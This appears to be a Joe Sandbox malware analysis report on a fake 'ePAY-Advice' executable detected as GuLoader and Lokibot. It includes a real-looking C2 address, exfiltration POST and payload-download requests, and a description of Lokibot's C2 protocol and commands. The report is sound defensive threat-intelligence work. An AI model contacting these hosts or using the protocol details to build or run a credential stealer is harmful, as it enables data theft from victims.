Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ePAY-Advice_Rf[UC7749879100].exe

Overview

General Information

Sample Name:ePAY-Advice_Rf[UC7749879100].exe
Analysis ID:828721
MD5:06bf8620598b674fc3506a2844d42d65
SHA1:00e28bd96e338f7bfff9c41d985de05f010d8ea7
SHA256:98883d7d2678fd8cbdad8b8c1ca7cf13a797b1074f081dee24aba14dcc346ffe
Infos:

Detection

GuLoader, Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Lokibot
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • ePAY-Advice_Rf[UC7749879100].exe (PID: 7800 cmdline: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe MD5: 06BF8620598B674FC3506A2844D42D65)
    • ePAY-Advice_Rf[UC7749879100].exe (PID: 4428 cmdline: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe MD5: 06BF8620598B674FC3506A2844D42D65)
      • WerFault.exe (PID: 7980 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 2000 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000001.00000002.52072378521.0000000003DE8000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: ePAY-Advice_Rf[UC7749879100].exe PID: 7800JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
        Process Memory Space: ePAY-Advice_Rf[UC7749879100].exe PID: 4428JoeSecurity_Lokibot_1Yara detected LokibotJoe Security
          No Sigma rule has matched
          Timestamp:192.168.11.20171.22.30.14749853802025381 03/17/23-14:12:55.965496
          SID:2025381
          Source Port:49853
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20171.22.30.14749853802024317 03/17/23-14:12:55.965496
          SID:2024317
          Source Port:49853
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20171.22.30.14749853802024312 03/17/23-14:12:55.965496
          SID:2024312
          Source Port:49853
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20171.22.30.14749853802021641 03/17/23-14:12:55.965496
          SID:2021641
          Source Port:49853
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20171.22.30.14749853802825766 03/17/23-14:12:55.965496
          SID:2825766
          Source Port:49853
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: ePAY-Advice_Rf[UC7749879100].exeVirustotal: Detection: 46%Perma Link
          Source: ePAY-Advice_Rf[UC7749879100].exeReversingLabs: Detection: 28%
          Source: http://171.22.30.147/flowe/five/fre.phpAvira URL Cloud: Label: malware
          Source: zed-unusual-activity-com.veldaeffertz.mlVirustotal: Detection: 6%Perma Link
          Source: ePAY-Advice_Rf[UC7749879100].exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.11.20:49852 version: TLS 1.2
          Source: ePAY-Advice_Rf[UC7749879100].exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIIRadeonHelper.pdb source: ePAY-Advice_Rf[UC7749879100].exe, 00000001.00000003.50978469386.00000000028DE000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr
          Source: Binary string: mshtml.pdb source: ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000001.51414610379.0000000000649000.00000020.00000001.01000000.00000006.sdmp
          Source: Binary string: mshtml.pdbUGP source: ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000001.51414610379.0000000000649000.00000020.00000001.01000000.00000006.sdmp
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 1_2_0040626D FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 1_2_00405732 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 1_2_004026FE FindFirstFileA,

          Networking

          barindex
          Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.11.20:49853 -> 171.22.30.147:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49853 -> 171.22.30.147:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49853 -> 171.22.30.147:80
          Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.11.20:49853 -> 171.22.30.147:80
          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.11.20:49853 -> 171.22.30.147:80
          Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Joe Sandbox ViewIP Address: 171.22.30.147 171.22.30.147
          Source: global trafficHTTP traffic detected: GET /CodkZc57.sea HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: zed-unusual-activity-com.veldaeffertz.mlCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /flowe/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FC5E27AContent-Length: 178Connection: close
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
          Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
          Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
          Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
          Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
          Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
          Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
          Source: unknownTCP traffic detected without corresponding DNS query: 171.22.30.147
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000001.00000003.50978469386.00000000028DE000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000001.00000003.50978469386.00000000028DE000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000003.52592723305.000000000525F000.00000004.00000020.00020000.00000000.sdmp, ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000002.52689966647.000000000525F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000001.00000003.50978469386.00000000028DE000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000001.00000003.50978469386.00000000028DE000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000001.00000003.50978469386.00000000028DE000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://crl.globalsign.com/root.crl0G
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000003.52592723305.000000000525F000.00000004.00000020.00020000.00000000.sdmp, ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000002.52689966647.000000000525F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000001.00000003.50978469386.00000000028DE000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000001.00000003.50978469386.00000000028DE000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000001.00000003.50978469386.00000000028DE000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000001.00000003.50978469386.00000000028DE000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000001.51414610379.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
          Source: ePAY-Advice_Rf[UC7749879100].exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: ePAY-Advice_Rf[UC7749879100].exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000001.00000003.50978469386.00000000028DE000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000001.00000003.50978469386.00000000028DE000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://ocsp.digicert.com0O
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000001.00000003.50978469386.00000000028DE000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://ocsp.globalsign.com/rootr103
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000001.00000003.50978469386.00000000028DE000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000001.00000003.50978469386.00000000028DE000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000001.00000003.50978469386.00000000028DE000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000001.00000003.50978469386.00000000028DE000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://www.digicert.com/CPS0
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000001.51414610379.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000001.51414610379.0000000000626000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000001.51414610379.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000001.51414610379.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000001.51414610379.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000003.52593956781.000000000513A000.00000004.00001000.00020000.00000000.sdmp, ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000003.52593956781.0000000005130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000003.52593956781.000000000513A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000003.52593956781.000000000513A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000003.52593956781.000000000513A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000001.00000003.50978469386.00000000028DE000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000001.00000003.50978469386.00000000028DE000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: https://www.globalsign.com/repository/0
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000002.52688998732.00000000051A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zed-unusual-activity-com.veldaeffertz.ml/
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000002.52688998732.00000000051A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zed-unusual-activity-com.veldaeffertz.ml/0
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000002.52688998732.00000000051A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zed-unusual-activity-com.veldaeffertz.ml/CodkZc57.sea
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000002.52688998732.00000000051A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zed-unusual-activity-com.veldaeffertz.ml/CodkZc57.sea-T
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000002.52688998732.00000000051A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zed-unusual-activity-com.veldaeffertz.ml/CodkZc57.sear&
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000002.52688998732.00000000051A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zed-unusual-activity-com.veldaeffertz.ml/P
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000005.00000002.52688998732.00000000051A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zed-unusual-activity-com.veldaeffertz.ml/z
          Source: unknownHTTP traffic detected: POST /flowe/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FC5E27AContent-Length: 178Connection: close
          Source: unknownDNS traffic detected: queries for: zed-unusual-activity-com.veldaeffertz.ml
          Source: global trafficHTTP traffic detected: GET /CodkZc57.sea HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: zed-unusual-activity-com.veldaeffertz.mlCache-Control: no-cache
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.11.20:49852 version: TLS 1.2
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 1_2_004051CF GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
          Source: ePAY-Advice_Rf[UC7749879100].exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 2000
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 1_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 1_2_00404A0E
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 1_2_004065F6
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 1_2_6DA21A9C
          Source: ePAY-Advice_Rf[UC7749879100].exe, 00000001.00000003.50978469386.00000000028DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAEGISIIIRadeonHelper< vs ePAY-Advice_Rf[UC7749879100].exe
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeSection loaded: edgegdi.dll
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeSection loaded: edgegdi.dll
          Source: ePAY-Advice_Rf[UC7749879100].exeStatic PE information: invalid certificate
          Source: ePAY-Advice_Rf[UC7749879100].exeVirustotal: Detection: 46%
          Source: ePAY-Advice_Rf[UC7749879100].exeReversingLabs: Detection: 28%
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeFile read: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeJump to behavior
          Source: ePAY-Advice_Rf[UC7749879100].exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess created: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 2000
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeProcess created: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 1_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeFile created: C:\Users\user\AppData\Roaming\fumigatoriumJump to behavior
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeFile created: C:\Users\user\AppData\Local\Temp\nso6DB2.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/19@23/2
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 1_2_004020D1 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeCode function: 1_2_0040449B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeMutant created: \Sessions\1\BaseNamedObjects\28278665D4ACB73EF64D459A
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeFile written: C:\Users\user\AppData\Local\Temp\Kontos.iniJump to behavior
          Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
          Source: ePAY-Advice_Rf[UC7749879100].exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
